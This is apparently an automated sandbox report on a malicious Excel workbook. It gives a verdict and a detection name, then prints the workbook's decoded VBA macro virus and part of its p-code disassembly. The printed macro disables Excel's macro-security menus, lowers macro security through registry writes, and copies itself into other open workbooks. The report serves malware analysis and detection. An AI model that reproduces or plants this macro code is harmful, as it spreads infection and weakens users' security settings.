Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is an Excel workbook containing VBA macros. The macro attempts to lower Excel's macro security settings by writing to the registry values HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6 (set to 0) and HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level (set to 1), as visible in the extracted script. It then copies its own module code into the active workbook and saves it, potentially to execute a payload or establish persistence. The ClamAV detection 'Xls.Trojan.Tester-3' further supports its malicious nature.
Heuristics (1)
- VBA macros detected (severity: medium, rule: OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5944 bytes |
SHA-256: 9418001078baf582ace9987c320032853c5b880e9dafdee710fbc719192de9ed
Detection (ClamAV): Xls.Trojan.Tester-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XM97/2k.tEster
Sub Workbook_Deactivate()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
CommandBars("Tools").Controls("Macro").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = 0&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule 'cz
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule 'us
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule 'de
Set ThisBook = ThisWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule 'cz
Set ThisBook = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule 'us
Set ThisBook = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule 'de
vxCopy = ThisBook.Lines(1, ThisBook.countoflines)
If ActiveBook.Lines(1, 1) <> "'XM97/2k.tEster" Then
ActiveBook.deletelines 1, ActiveBook.countoflines
ActiveBook.insertlines 1, vxCopy
If ActiveWorkbook.Path = "" Then
ActiveWorkbook.SaveAs ActiveWorkbook.FullName
Else
ActiveWorkbook.Save
End If
End If
'XM97/2k.tEster by gl_st0rm of [mions]
End Sub
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/d689602d65f2471f966bba7c893ec1a5.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Tento_sešit - 3550 bytes
' Line #0:
' QuoteRem 0x0000 0x000E "XM97/2k.tEster"
' Line #1:
' Line #2:
' FuncDefn (Sub deletelines())
' Line #3:
' OnError (Resume Next)
' Line #4:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd Controls 0x0001
' ArgsMemLd Enabled 0x0001
' MemSt System
' Line #5:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd Controls 0x0001
' ArgsMemLd Enabled 0x0001
' MemSt System
' Line #6:
' LitDI4 0x0000 0x0000
' LitStr 0x0000 ""
' LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
' LitStr 0x0008 "Options6"
' Ld PrivateProfileString
' ArgsMemSt book 0x0003
' Line #7:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security"
' LitStr 0x0005 "Level"
' Ld PrivateProfileString
' ArgsMemSt book 0x0003
' Line #8:
' SetStmt
' LitStr 0x000B "Tento_sešit"
' Ld VBProject
' MemLd VBComponents
' ArgsMemLd CodeModule 0x0001
' MemLd Item
' Set _B_var_ActiveBook
' QuoteRem 0x0058 0x0002 "cz"
' Line #9:
' SetStmt
' LitStr 0x000C "ThisWorkbook"
' Ld VBProject
' MemLd VBComponents
' ArgsMemLd CodeModule 0x0001
' MemLd Item
' Set _B_var_ActiveBook
' QuoteRem 0x0058 0x0002 "us"
'
... (truncated)